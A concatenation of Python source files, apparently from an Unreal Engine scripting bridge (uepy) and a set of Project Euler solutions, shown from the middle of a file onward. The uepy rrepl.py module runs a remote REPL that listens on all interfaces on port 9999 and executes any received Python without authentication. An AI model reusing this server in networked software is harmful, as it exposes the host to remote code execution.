value) setattr(cls, name, property(_get, _set)) setup(_name) # create a closure so we don't lose the name def IsHost(): return GetWorld().IsServer() class AActor_PGLUE(metaclass=PyGlueMetaclass): '''Glue class for AActor''' repProps = Bag( loc = FVector(0,0,0), rot = FRotator(0,0,0), ) def __init__(self): self.EndingPlay = Event() # fires (self) on EndPlay. super().__init__() def OnRep_loc(self): self.SetActorLocation(self.nr.loc) def OnRep_rot(self): self.SetActorRotation(self.nr.rot) def PostInitializeComponents(self): self.engineObj.SuperPostInitializeComponents() def GetName(self): return self.engineObj.GetName() def GetIsReplicated(self): return self.engineObj.GetIsReplicated() def SetReplicates(self, b): self.engineObj.SetReplicates(b) def HasLocalNetOwner(self): return self.engineObj.HasLocalNetOwner() def GetWorld(self): return self.engineObj.GetWorld() def GetOwner(self): return self.engineObj.GetOwner() def SetOwner(self, o): self.engineObj.SetOwner(o) def GetTransform(self): return self.engineObj.GetTransform() def SetActorLocation(self, v): self.engineObj.SetActorLocation(v) # this works because engineObj is a pointer to a real instance, and we will also write wrapper code to expose these APIs anyway def GetActorLocation(self): return self.engineObj.GetActorLocation() def GetActorRotation(self): return self.engineObj.GetActorRotation() def GetActorTransform(self): return self.engineObj.GetActorTransform() def SetActorRotation(self, r): self.engineObj.SetActorRotation(r) def GetActorScale3D(self): return self.engineObj.GetActorScale3D() def SetActorScale3D(self, s): self.engineObj.SetActorScale3D(s) def CreateUStaticMeshComponent(self, name): return self.engineObj.CreateUStaticMeshComponent(name) def GetRootComponent(self): return self.engineObj.GetRootComponent() def SetRootComponent(self, s): self.engineObj.SetRootComponent(s) def GetComponentsByClass(self, klass): return self.engineObj.GetComponentsByClass(klass) def IsValid(self): return self.engineObj.IsValid() def BeginPlay(self): self.engineObj.SuperBeginPlay() def EndPlay(self, reason): self.EndingPlay.Fire(self) self.engineObj.SuperEndPlay(reason) def Tick(self, dt): self.engineObj.SuperTick(dt) def HasAuthority(self): return self.engineObj.HasAuthority() def IsActorTickEnabled(self): return self.engineObj.IsActorTickEnabled() def SetActorTickEnabled(self, e): self.engineObj.SetActorTickEnabled(e) def SetActorTickInterval(self, i): self.engineObj.SetActorTickInterval(i) def GetActorTickInterval(self): return self.engineObj.GetActorTickInterval() def SetActorHiddenInGame(self, h): self.engineObj.SetActorHiddenInGame(h) def SetReplicateMovement(self, b): self.engineObj.SetReplicateMovement(b) def Destroy(self): return self.engineObj.Destroy() def BindOnEndPlay(self, cb): self.engineObj.BindOnEndPlay(cb) # NOTE: you may be better off using the EndingPlay Event instance. def UnbindOnEndPlay(self, cb): self.engineObj.UnbindOnEndPlay(cb) def Set(self, k, v): self.engineObj.Set(k, v) def Get(self, k): return self.engineObj.Get(k) def Call(self, funcName, *args): return self.engineObj.Call(funcName, *args) def UpdateTickSettings(self, canEverTick, startWithTickEnabled): self.engineObj.UpdateTickSettings(canEverTick, startWithTickEnabled) def OnReplicated(self): pass def GetFilteredComponents(self, ofClass=UPrimitiveComponent, onlyVisible=True, ignore=None, ignoreTag=None, includeAttachedActors=False): '''Returns a list of all of this actor's visible mesh component (including descendants) that are instances of the given component class (or one of its descendents). If ignore is provided, it should be a list of components to omit. If onlyVisible is True, excludes any hidden components. If includeAttachedActors is True, also return components of attached children actors. If ignoreTag is provided, any components that has that tag will be skipped.''' ret = [] root = self.GetRootComponent() if not root: return ret thisActorAddr = AddressOf(self.engineObj) ignore = ignore or [] ignore = [ofClass.Cast(x) for x in ignore] # this is so the check against the casted value works ignore = [x for x in ignore if x] ignoreTag = (ignoreTag or '').lower() for comp in root.GetChildrenComponents(True): if thisActorAddr != AddressOf(comp.GetOwner()) and not includeAttachedActors: continue if onlyVisible and not comp.IsVisible(): continue if ignoreTag and ignoreTag in comp.ComponentTags: continue comp = ofClass.Cast(comp) if not comp: continue if comp in ignore: continue ret.append(comp) return ret @property def configStr(self): return self.engineObj.configStr CPROPS(AActor_PGLUE, 'bAlwaysRelevant', 'bReplicates', 'Tags') class APawn_PGLUE(AActor_PGLUE): def IsLocallyControlled(self): return self.engineObj.IsLocallyControlled() def SetupPlayerInputComponent(self, comp): self.engineObj.SuperSetupPlayerInputComponent(comp) def GetPlayerState(self): return self.engineObj.GetPlayerState() class USceneComponent_PGLUE(metaclass=PyGlueMetaclass): @classmethod def Cast(cls, obj): return cls.engineClass.Cast(obj) def IsValid(self): return self.engineObj.IsValid() def BeginPlay(self): self.engineObj.SuperBeginPlay() def EndPlay(self, reason): self.engineObj.SuperEndPlay(reason) def OnRegister(self): self.engineObj.SuperOnRegister() def ComponentHasTag(self, tag): return self.engineObj.ComponentHasTag(tag) def GetOwner(self): return self.engineObj.GetOwner() def GetName(self): return self.engineObj.GetName() def SetIsReplicated(self, r): self.engineObj.SetIsReplicated(r) def SetActive(self, a): self.engineObj.SetActive(a) def IsRegistered(self): return self.engineObj.IsRegistered() def RegisterComponent(self): self.engineObj.RegisterComponent() def UnregisterComponent(self): self.engineObj.UnregisterComponent() def DestroyComponent(self): self.engineObj.DestroyComponent() def GetRelativeLocation(self): return self.engineObj.GetRelativeLocation() def SetRelativeLocation(self, x): self.engineObj.SetRelativeLocation(x) def GetRelativeRotation(self): return self.engineObj.GetRelativeRotation() def SetRelativeRotation(self, x): self.engineObj.SetRelativeRotation(x) def GetRelativeScale3D(self): return self.engineObj.GetRelativeScale3D() def SetRelativeScale3D(self, x): self.engineObj.SetRelativeScale3D(x) def GetRelativeTransform(self): return self.engineObj.GetRelativeTransform() def SetRelativeTransform(self, x): self.engineObj.SetRelativeTransform(x) def SetRelativeLocationAndRotation(self, loc, rot): self.engineObj.SetRelativeLocationAndRotation(loc, rot) def ResetRelativeTransform(self): return self.engineObj.ResetRelativeTransform() def AttachToComponent(self, parent, socket=''): return self.engineObj.AttachToComponent(parent, socket) def SetupAttachment(self, parent, socket=''): return self.engineObj.SetupAttachment(parent, socket) def DetachFromComponent(self): return self.engineObj.DetachFromComponent() def SetVisibility(self, vis, propagate=True): self.engineObj.SetVisibility(vis, propagate) def IsVisible(self): return self.engineObj.IsVisible() def GetHiddenInGame(self): return self.engineObj.GetHiddenInGame() def SetHiddenInGame(self, h, propagate=True): self.engineObj.SetHiddenInGame(h, propagate) def GetForwardVector(self): return self.engineObj.GetForwardVector() def GetRightVector(self): return self.engineObj.GetRightVector() def GetUpVector(self): return self.engineObj.GetUpVector() def GetComponentLocation(self): return self.engineObj.GetComponentLocation() def GetComponentRotation(self): return self.engineObj.GetComponentRotation() def GetComponentQuat(self): return self.engineObj.GetComponentQuat() def GetComponentScale(self): return self.engineObj.GetComponentScale() def GetComponentToWorld(self): return self.engineObj.GetComponentToWorld() def GetAttachParent(self): return self.engineObj.GetAttachedParent() def GetChildrenComponents(self, includeAllDescendents): return self.engineObj.GetChildrenComponents(includeAllDescendents) def SetWorldLocation(self, x): self.engineObj.SetWorldLocation(x) def SetWorldRotation(self, x): self.engineObj.SetWorldRotation(x) def GetSocketTransform(self, name): return self.engineObj.GetSocketTransform(name) def GetSocketLocation(self, name): return self.engineObj.GetSocketLocation(name) def GetSocketRotation(self, name): return self.engineObj.GetSocketRotation(name) def CalcBounds(self, locToWorld): return self.engineObj.CalcBounds(locToWorld) def SetMobility(self, m): self.engineObj.SetMobility(m) CPROPS(USceneComponent_PGLUE, 'ComponentTags') class UBoxComponent_PGLUE(USceneComponent_PGLUE): def SetCollisionEnabled(self, e): self.engineObj.SetCollisionEnabled(e) # this is actually from UPrimitiveComponent def BeginPlay(self): self.engineObj.SuperBeginPlay() def EndPlay(self, reason): self.engineObj.SuperEndPlay(reason) def OnRegister(self): self.engineObj.SuperOnRegister() def SetBoxExtent(self, e): self.engineObj.SetBoxExtent(e) def GetUnscaledBoxExtent(self): return self.engineObj.GetUnscaledBoxExtent() class UEPYAssistantActor(AActor_PGLUE): '''Spawn one of these into a level to have it watch for source code changes and automatically reload modified code.''' def __init__(self): self.SetReplicates(False) super().__init__() self.SetActorTickEnabled(True) self.lastCheck = 0 self.watcher = None self.forceDevModuleReload = True def BeginPlay(self): super().BeginPlay() self.start = time.time() def Tick(self, dt): now = time.time() if self.watcher is None: import sourcewatcher as S if now-self.start > 1: # Try to grab a global sourcewatcher that already exists self.watcher = S.GetGlobalInstance() if self.watcher is None: log('Starting new source watcher') S.log = log S.logTB = logTB self.watcher = S.SourceWatcher() else: log('Reusing global source watcher') elif now-self.lastCheck > 0.25: self.watcher.Check(forceDevModuleReload=self.forceDevModuleReload) self.forceDevModuleReload = False # we just want to force scratchpad to reload on start self.lastCheck = time.time() def AddHelper(): SpawnActor(GetWorld(), UEPYAssistantActor) class UUserWidget_PGLUE(metaclass=PyGlueMetaclass): '''Base class of all Python subclasses from AActor-derived C++ classes''' # TODO: why doesn't this live in umg.py? # We do not implement a default Tick but instead have the C++ only call into Python if a Tick function is defined #def Tick(self, geometry, dt): pass def SpawnActor(world, klass, location=None, rotation=None, **kwargs): '''Extends __uepy.SpawnActor_ so that you can also pass in values for any UPROPERTY fields''' if location is None: location = FVector(0,0,0) if rotation is None: rotation = FRotator(0,0,0) return SpawnActor_(world, klass, location, rotation, kwargs) class RefCache: '''Asset loader. Repeated calls to load the same asset will be fast because previous loads are cached. All assets are loaded by their UE4 editor reference string (right-click on asset and choose to copy the reference).''' def __init__(self): self.cache = {} # editor reference string --> loaded instance of an asset # prefix portion of the editor reference string; each type a new type of asset is loaded, an entry is added to the map. # In most cases, the prefix is the class name without the U prefix (e.g. a 'PaperSprite' --> UPaperSprite), but any # special cases should be added to the initial values below. self.classMap = dict( Blueprint=UBlueprintGeneratedClass, MaterialInstanceConstant=UMaterialInstance, WidgetBlueprint=UBlueprintGeneratedClass, ) def Load(self, ref): '''Given an editor reference string, returns the cached asset, loading it if needed. Returns None if it can't be loaded.''' # TODO: UE4 often seems to blur the lines between assets that are classes for generating stuff and assets that are stuff, # and that blurriness carries over to this function. We might want to someday have e.g. LoadClassByRef and LoadObjectByRef # functions to make the caller's intentions more explicit. Or maybe it never really matters. obj = self.cache.get(ref) if obj is not None: # cache hit! return obj objType, path, ignore = ref.split("'") # it's something like Blueprint'/Game/Path/To/Some/Object' # Find the UE4 class for this reference, trying to auto-discover it this is the first encounter cls = self.classMap.get(objType) if cls is None: cls = globals().get('U' + objType) if cls is not None: self.classMap[objType] = cls # yay, remember for next time if cls is None: raise Exception('RefCache cannot handle references of type ' + repr(objType)) if cls == UBlueprintGeneratedClass and not path.endswith('_C'): # The UE4 reference will be like "Blueprint'/Game/Whatever'" but we want the class that the BP generates path += '_C' obj = StaticLoadObject(cls, path) if obj is not None: if cls != UBlueprintGeneratedClass: # if we cast these, it breaks stuff because the result isn't what we want obj = cls.Cast(obj) self.cache[ref] = obj return obj def Clear(self): '''Removes from memory all cached references''' self.cache.clear() def GetReferencePath(self, obj): '''Given an asset, such as a UMaterialInstance, returns a reference path for it, in the same format as right-clicking an asset in the editor and choosing "Copy Reference"''' className = obj.GetClass().GetName() classPath = obj.GetPathName() if className.endswith('GeneratedClass') and classPath.endswith('_C'): className = className[:-len('GeneratedClass')] classPath = classPath[:-2] return "%s'%s'" % (className, classPath) # global ref cache _refCache = RefCache() LoadByRef = _refCache.Load ClearRefCache = _refCache.Clear GetReferencePath = _refCache.GetReferencePath def Caller(level=2): '''Debugging helper - returns info on the call stack (default=who called the caller of the caller)''' frame = inspect.stack()[level] return '[%s:%d]' % (frame.function, frame.lineno)
dfb/uepy
Content/Scripts/uepy/enums.py
<reponame>dfb/uepy<filename>Content/Scripts/uepy/enums.py<gh_stars>1-10 ''' Engine enumerations exposed to Python, along with a base enum class that adds a reverse mapping (value-to-name) API. ''' class EnumMeta(type): '''Used by Enum class''' def __new__(metaclass, name, bases, dct): # Create an inverse mapping of values to name - note that in the case of multiple names mapping to # the same value, you can't know which one will be returned when NameFor is called. inverse = {} for k,v in dct.items(): if type(v) is int: inverse[v] = k dct['_inverse'] = inverse # Also make each enum accessible as a purely lowercase name to aid in translating user input (or # some other source that may not know the proper capitalization) to enum values for v,k in inverse.items(): dct[k.lower()] = v return super().__new__(metaclass, name, bases, dct) class Enum(metaclass=EnumMeta): '''Base class for all Enums we expose to Python''' @classmethod def NameFor(cls, v): '''Given an enum value, returns the string name of that value''' return cls._inverse[v] @classmethod def Inverse(cls): '''Returns a mapping of enum value --> name''' return cls._inverse @classmethod def Values(cls): '''Returns a list of all of the enum's values''' return list(cls._inverse.keys()) class EForceInit(Enum): ForceInit, ForceInitToZero = range(2) class EEngineMode(Enum): '''Tells which mode we're in right now''' Unknown, Build, SrcCLI, Editor, PIE = range(5) class EWorldType(Enum): NONE, Game, Editor, PIE, EditorPreview, GamePreview, Inactive = range(7) class EHorizontalAlignment(Enum): HAlign_Fill = Fill = 0 HAlign_Left = Left = 1 HAlign_Center = Center = 2 HAlign_Right = Right = 3 class EVerticalAlignment(Enum): VAlign_Fill = Fill = 0 VAlign_Top = Top = 1 VAlign_Center = Center = 2 VAlign_Bottom = Bottom = 3 class ECollisionChannel(Enum): ECC_WorldStatic, ECC_WorldDynamic, ECC_Pawn, ECC_Visibility, ECC_Camera, ECC_PhysicsBody, ECC_Vehicle, ECC_Destructible, ECC_EngineTraceChannel1,\ ECC_EngineTraceChannel2, ECC_EngineTraceChannel3, ECC_EngineTraceChannel4, ECC_EngineTraceChannel5, ECC_EngineTraceChannel6, ECC_GameTraceChannel1,\ ECC_GameTraceChannel2, ECC_GameTraceChannel3, ECC_GameTraceChannel4, ECC_GameTraceChannel5, ECC_GameTraceChannel6, ECC_GameTraceChannel7,\ ECC_GameTraceChannel8, ECC_GameTraceChannel9, ECC_GameTraceChannel10, ECC_GameTraceChannel11, ECC_GameTraceChannel12, ECC_GameTraceChannel13,\ ECC_GameTraceChannel14, ECC_GameTraceChannel15, ECC_GameTraceChannel16, ECC_GameTraceChannel17, ECC_GameTraceChannel18 = range(32) class ECollisionEnabled(Enum): NoCollision, QueryOnly, PhysicsOnly, QueryAndPhysics = range(4) class ECollisionResponse(Enum): ECR_Ignore, ECR_Overlap, ECR_Block = range(3) Ignore = ECR_Ignore Overlap = ECR_Overlap Block = ECR_Block class EEasingFunc(Enum): Linear, Step, SinusoidalIn, SinusoidalOut, SinusoidalInOut, EaseIn, EaseOut, EaseInOut, ExpoIn, ExpoOut, ExpoInOut, CircularIn, CircularOut, CircularInOut = range(14) class EDrawDebugTrace(Enum): NONE, ForOneFrame, ForDuration, Persistent = range(4) class EHMDTrackingOrigin(Enum): Floor, Eye, Stage = range(3) class ESlateColorStylingMode(Enum): UseColor_Specified, UseColor_Specified_Link, UseColor_Foreground, UseColor_Foreground_Subdued = range(4) class ESlateVisibility(Enum): Visible, Collapsed, Hidden, HitTestInvisible, SelfHitTestInvisible = range(5) class ESlateSizeRule(Enum): Automatic, Fill = range(2) class ETextJustify(Enum): Left, Center, Right = range(3) class EOrientation(Enum): Orient_Horizontal, Orient_Vertical = range(2) Horizontal, Vertical = Orient_Horizontal, Orient_Vertical class EControllerHand(Enum): Left, Right, AnyHand = range(3) class ELightUnits(Enum): Unitless, Candelas, Lumens = range(3) class ESceneCaptureSource(Enum): SCS_SceneColorHDR, SCS_SceneColorHDRNoAlpha, SCS_FinalColorLDR, SCS_SceneColorSceneDepth, SCS_SceneDepth, SCS_DeviceDepth, SCS_Normal, SCS_BaseColor, SCS_FinalColorHDR = range(9) class EVisibilityPropagation(Enum): NoPropagation, DirtyOnly, Propagate = range(3) class EStretchDirection: Both, DownOnly, UpOnly = range(3) class EStretch: NONE, Fill, ScaleToFit, ScaleToFitX, ScaleToFitY, ScaleToFill, ScaleBySafeZone, UserSpecified = range(8) class EInputEvent(Enum): IE_Pressed, IE_Released, IE_Repeat, IE_DoubleClick, IE_Axis, IE_MAX = range(6) class ENRSpawnReplicatedBy(Enum): NONE, App, Engine, NR = range(4) # Who is in charge of replicating the act of spawning a particular object class ENRWhere(Enum): NONE, Local, Host, NotMe = [0,1,2,4] All = Local|Host|NotMe USER = 128 # special flag indicating the lower 7 bits are a user ID def Only(self, userID): '''Helper to create a value that means "send this message only to a specific user"''' assert userID < 128, userID return userID | self.USER class EWidgetSpace(Enum): World, Screen = range(2) class EWidgetGeometryMode(Enum): Plane, Cylinder = range(2) class EWidgetInteractionSource(Enum): World, Mouse, CenterScreen, Custom = range(4) class ESplineCoordinateSpace(Enum): Local, World = range(2) class ESplinePointType(Enum): Linear, Curve, Constant, CurveClamped, CurveCustomTangent = range(5) class EComponentMobility(Enum): Static, Stationary, Movable = range(3) class ERelativeTransformSpace(Enum): RTS_World, RTS_Actor, RTS_Component, RTS_ParentBoneSpace = range(4) class EOnJoinSessionCompleteResult(Enum): Success, SessionIsFull, SessionDoesNotExist, CouldNotRetrieveAddress, AlreadyInSession, UnknownError = range(6) # this is a made-up enum since we don't yet expose FAttachmentTransformRules class EAttachmentTransformRule(Enum): KeepRelativeTransform, KeepWorldTransform = range(2) class ESkyLightSourceType(Enum): SLS_CapturedScene, SLS_SpecifiedCubemap = range(2)
dfb/uepy
Content/Scripts/uepy/rrepl.py
''' Embeddable read-eval-print loop for Python applications. Example usage: # during application startup repl = RemoteREPL() # optionally pass in listen host and/or port # call this often during app lifetime repl.Process() To connect use telnet or: python -m telnetlib 127.0.0.1 9999 # or other host/port as needed Notes: - For applications that have restrictions on what can be run from non-main threads, be sure to call repl.Process from the appropriate thread (e.g. a game's main thread) - TODO: support _ for last-result shortcut ''' import code, time, threading, sys, socketserver, selectors, traceback, queue # patchable - TODO use python logging log = print def logTB(): for line in traceback.format_exc().split('\n'): log(line) class RemoteREPL(socketserver.TCPServer): def __init__(self, host='', port=9999, env=None): # env is e.g. globals() super().__init__((host, port), REPLRequestHandler) sys.displayhook = self.SysDisplayHook self.incoming = queue.Queue() self.outgoing = queue.Queue() self.lastProcess = 0 class EmbeddedConsole(code.InteractiveConsole): def write(self, value): '''called on errors/tracebacks''' self.server.outgoing.put(value + '\n') if env is None: env = globals() self.console = EmbeddedConsole(env) self.console.server = self t = threading.Thread(target=self.serve_forever) t.daemon = True t.start() def SysDisplayHook(self, value): '''called on interactive writes to sys.stdout''' if value is not None: self.outgoing.put(repr(value)+'\n') def Process(self): '''Should be called periodically from the application's main thread to execute the next waiting command, if any''' now = time.time() since = now - self.lastProcess self.lastProcess = now try: try: next = self.incoming.get_nowait() more = self.console.push(next) # echo back a different prompt based on whether or not we detected the command as complete if more: self.outgoing.put('... ') else: self.outgoing.put('>>> ') except queue.Empty: pass except: logTB() class REPLRequestHandler(socketserver.BaseRequestHandler): def OnReadable(self, sock): '''Reads any incoming input from the remote side and enqueues it for a call to Process''' # TODO: use recv_into, a buffer, etc. instead of += strings more = sock.recv(4096) if not more: self.keepRunning = False else: self.readBuffer += more.decode('utf8') if '\n' in self.readBuffer: line, self.readBuffer = self.readBuffer.split('\n', 1) if line.strip() == 'exit()': # Special case: instead of shutting down the whole process, just disconnect self.keepRunning = False else: self.server.incoming.put(line) def handle(self): '''Reads/writes data until the connection closes''' self.readBuffer = '' self.keepRunning = True selector = selectors.DefaultSelector() selector.register(self.request, selectors.EVENT_READ, self.OnReadable) log('REPL starting') self.server.outgoing.put('Connected to remote REPL\n') self.server.outgoing.put('>>> ') try: while self.keepRunning: for key, mask in selector.select(0.05): key.data(key.fileobj) # Send queued output while 1: try: out = self.server.outgoing.get_nowait() self.request.sendall(out.encode('utf8')) except queue.Empty: break finally: log('REPL quitting') if __name__ == '__main__': repl = RemoteREPL() while 1: repl.Process() time.sleep(0.1)
dfb/uepy
Content/Scripts/uepy/editor_spawner.py
# Creates a tab/window in the editor for spawning Python-based actors import uepy, time from uepy import umg, editor from uepy import log, logTB class SpawnerTab(uepy.UUserWidget_PGLUE): def __init__(self): self.num = int(time.time()) def Construct(self, vboxRoot): log('editor_spawner.SpawnerTab.Construct:', vboxRoot) vboxRoot = umg.UVerticalBox.Cast(vboxRoot) margin = uepy.FMargin(5,5,5,5) # Row: combo box of class names + refresh button hb = umg.UHorizontalBox.Cast(umg.CreateWidget(vboxRoot, umg.UHorizontalBox, 'hb')) slot = umg.UVerticalBoxSlot.Cast(vboxRoot.AddChild(hb)) slot.SetPadding(margin) self.comboBox = umg.UComboBoxString.Cast(umg.CreateWidget(hb, umg.UComboBoxString, 'comboBox')) self.comboBox.SetFontSize(11) umg.UHorizontalBoxSlot.Cast(hb.AddChild(self.comboBox)).SetPadding(margin) self.RepopulateClassList() self.comboBox.BindOnSelectionChanged(self.OnSelectionChanged) spawnButton = umg.UButton.Cast(umg.CreateWidget(hb, umg.UButton, 'spawnButton')) umg.UHorizontalBoxSlot.Cast(hb.AddChild(spawnButton)).SetPadding(margin) label = umg.UTextBlock.Cast(umg.CreateWidget(spawnButton, umg.UTextBlock, 'textblock')) label.SetText('Spawn') label.SetFontSize(11) spawnButton.SetContent(label) spawnButton.BindOnClicked(self.OnSpawnClicked) refreshButton = umg.UButton.Cast(umg.CreateWidget(hb, umg.UButton, 'refreshButton')) umg.UHorizontalBoxSlot.Cast(hb.AddChild(refreshButton)).SetPadding(margin) label = umg.UTextBlock.Cast(umg.CreateWidget(refreshButton, umg.UTextBlock, 'textblock')) label.SetText('Refresh') label.SetFontSize(11) refreshButton.SetContent(label) refreshButton.BindOnClicked(self.OnRefreshClicked) if 0: # Row: checkbox (delete old instances) + text hb = umg.UHorizontalBox.Cast(umg.CreateWidget(vboxRoot, umg.UHorizontalBox, 'hb2')) slot = umg.UVerticalBoxSlot.Cast(vboxRoot.AddChild(hb)) slot.SetPadding(margin) self.locationCheckbox = umg.UCheckBox.Cast(umg.CreateWidget(hb, umg.UCheckBox, 'checkbox')) umg.UHorizontalBoxSlot.Cast(hb.AddChild(self.locationCheckbox)).SetPadding(margin) self.locationCheckbox.SetIsChecked(True) self.hackCheck = self.locationCheckbox.BindOnCheckStateChanged(self.OnCheckStateChanged) label = umg.UTextBlock.Cast(umg.CreateWidget(hb, umg.UTextBlock, 'label')) slot = umg.UHorizontalBoxSlot.Cast(hb.AddChild(label)) slot.SetVerticalAlignment(uepy.enums.EVerticalAlignment.Center) slot.SetPadding(margin) label.SetText('Delete old instances before spawning') else: # msg telling them to use sourcewatcher hb = umg.UHorizontalBox.Cast(umg.CreateWidget(vboxRoot, umg.UHorizontalBox, 'hb2')) slot = umg.UVerticalBoxSlot.Cast(vboxRoot.AddChild(hb)) label.SetFontSize(11) slot.SetPadding(margin) label = umg.UTextBlock.Cast(umg.CreateWidget(hb, umg.UTextBlock, 'label')) label.SetFontSize(11) slot = umg.UHorizontalBoxSlot.Cast(hb.AddChild(label)) slot.SetVerticalAlignment(uepy.enums.EVerticalAlignment.Center) slot.SetPadding(margin) label.SetText('Instead of using this spawner, ask dave about using sourcewatcher!') def RepopulateClassList(self): self.comboBox.ClearOptions() _classes = list(uepy.GetPythonEngineSubclasses().values()) glueClasses = uepy.GetAllGlueClasses() # TODO: filter out glue classes for widgets classes = [] for klass in _classes: # TODO: there's got to be a better way than this foundGlueBase = False for gc in glueClasses: if issubclass(klass, gc): foundGlueBase = True break if foundGlueBase: classes.append(klass) classes.sort(key=lambda x:x.__name__.split('.')[-1]) self.classes = classes for c in classes: self.comboBox.AddOption(c.__name__.split('.')[-1]) self.comboBox.SetSelectedIndex(0) def OnRefreshClicked(self, *args, **kwargs): # TODO: we're only refreshing the list, not triggering any modules to reload self.RepopulateClassList() def OnSpawnClicked(self, *args, **kwargs): editor.DeselectAllActors() world = editor.GetWorld() # TODO: how about just uepy.GetWorld to allow spawning during PIE too? index = max(0,self.comboBox.GetSelectedIndex()) klass = self.classes[index] actor = uepy.SpawnActor(world, klass) editor.SelectActor(actor) def OnSelectionChanged(self, *args, **kwargs): log('ON SELCH', self, args, kwargs) def OnCheckStateChanged(self, *args, **kwargs): log('ON CHECK', self, args, kwargs) editor.RegisterNomadTabSpawner(SpawnerTab, 'uepy Spawner') ''' UEditableTextBox SEditableTextBox w/ hint_text '''
dfb/uepy
Content/Scripts/uepy/umg.py
<reponame>dfb/uepy from _uepy import * from _uepy._umg import *
dfb/uepy
Content/Scripts/uepy/editor.py
from _uepy import * from _uepy._editor import *
cgnik/euler
src/py/util/nth.py
def nth(test, items): if test > 0: test -= 1 else: test = 0 for i, v in enumerate(items): if i == test: return v
cgnik/euler
src/py/problem26.py
# A unit fraction contains 1 in the numerator. The decimal representation of the unit fractions with denominators 2 to 10 are given: # # 1/2 = 0.5 # 1/3 = 0.(3) # 1/4 = 0.25 # 1/5 = 0.2 # 1/6 = 0.1(6) # 1/7 = 0.(142857) # 1/8 = 0.125 # 1/9 = 0.(1) # 1/10 = 0.1 # Where 0.1(6) means 0.166666..., and has a 1-digit recurring cycle. It can be seen that 1/7 has a 6-digit recurring cycle. # # Find the value of d < 1000 for which 1/d contains the longest recurring cycle in its decimal fraction part. from util.repeats import unit_fraction_cycle max_precision = 4096 def problem26(): candidates = [] print("Problem 26: Unit fraction cycles") for x in range(7, 1000): print(f"\rcalculating cycles: {int(x / 10)}%", end='', flush=True) cycle = unit_fraction_cycle(x, max_precision) if cycle != '': candidates.append((x, cycle)) candidates = list(filter(lambda x: x[1] != '', candidates)) candidates = [(len(c[1]), c[0], c[1]) for c in candidates] candidates.sort(reverse=True) print(f"\nCandidates(len {len(candidates)}): {candidates}") print(f"Problem 26 answer: {candidates[0]}") problem26()
cgnik/euler
src/py/util/permutation.py
<filename>src/py/util/permutation.py def permutations(items): # c is an encoding of the stack state. c[k] encodes the for-loop counter for when generate(k+1, A) is called c = [0 for c in range(0, len(items))] yield items # i acts similarly to the stack pointer i = 0 while i < len(items): if c[i] < i: if i % 2 == 0: items[0], items[i] = items[i], items[0] else: items[c[i]], items[i] = items[i], items[c[i]] yield items c[i] += 1 i = 0 else: c[i] = 0 i += 1 def gen_bits(bit_count, max_bits): end = pow(2, max_bits) for i in range(0, end): if bin(i).count('1') == bit_count: yield i def combinations(people, seat_count=0): people_count = len(people) if seat_count < 1: seat_count = len(people) # assumption: len(people) >= seats # strategy: use a bit to rep a single person # generate all possible numbers with bit array of len(people) # find all values in that list with seat_count bits turned on # map back onto people and output bits_format = "{0:>0" + str(people_count) + "b}" results = [] for combo in gen_bits(seat_count, len(people)): result = [] for i in range(people_count - 1, -1, -1): if (1 << i) & combo: result.append(people[i]) results.append(result) return results def permute(a, k): # heap's algorithm if k == 1: yield a.copy() else: yield from permute(a, k - 1) for i in range(0, k - 1): target = 0 if k % 2 == 0: target = i - 1 a[target], a[i] = a[i], a[target] yield from permute(a, k - 1) def permute_all(a): return permute(a, len(a)) def permute_all_combinations(a, length): results = [] for c in combinations(a, length): results += permute_all(c) return set(map(tuple, results))
cgnik/euler
src/py/problem22.py
# https://projecteuler.net/problem=22 # Using names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score. # # For example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN would obtain a score of 938 ร— 53 = 49714. # # What is the total of all the name scores in the file? import string def problem22(): names = None with open("p022_names.txt") as f: names = f.read().replace('"', '').split(',') names.sort() letters = [' '] + [a for a in string.ascii_uppercase] def score(s): return sum(map(lambda x: letters.index(x), [a for a in s])) answer = [] for i in range(0, len(names)): sc = score(names[i]) answer.append(sc * (i + 1)) print(f"Problem 22 answer: {sum(answer)}") problem22()
cgnik/euler
src/py/problem17.py
from num2words import num2words def problem17(): print(f"Problem 17: {sum([len(num2words(a).replace(' ', '').replace('-', '')) for a in range(1,1001)])}") problem17()
cgnik/euler
src/py/util/factoring.py
<gh_stars>0 from math import sqrt from util.divisible import divisible_by def factors(num): n = num yield 1 for x in [2, 3, 5, 7]: while n % x == 0: n = int(n / x) yield x f = 11 while f <= int(sqrt(n)): if n % f == 0: yield f while n % f == 0: n = int(n / f) f += 2 # compensate for 22/11 problem if num % n == 0: yield n yield num def is_prime(x, lower_primes): divisors = filter(lambda b: b <= int(x / 2), lower_primes) return not divisible_by(x, divisors) def is_prime_quick(x): if x <= 3: return x > 1 elif x % 2 == 0 or x % 3 == 0: return False i = 5 while i * i <= x: # while i * 3 <= x: // works exactly the same as above, though more cycles if x % i == 0: return False i += 2 return True
cgnik/euler
src/py/problem11.py
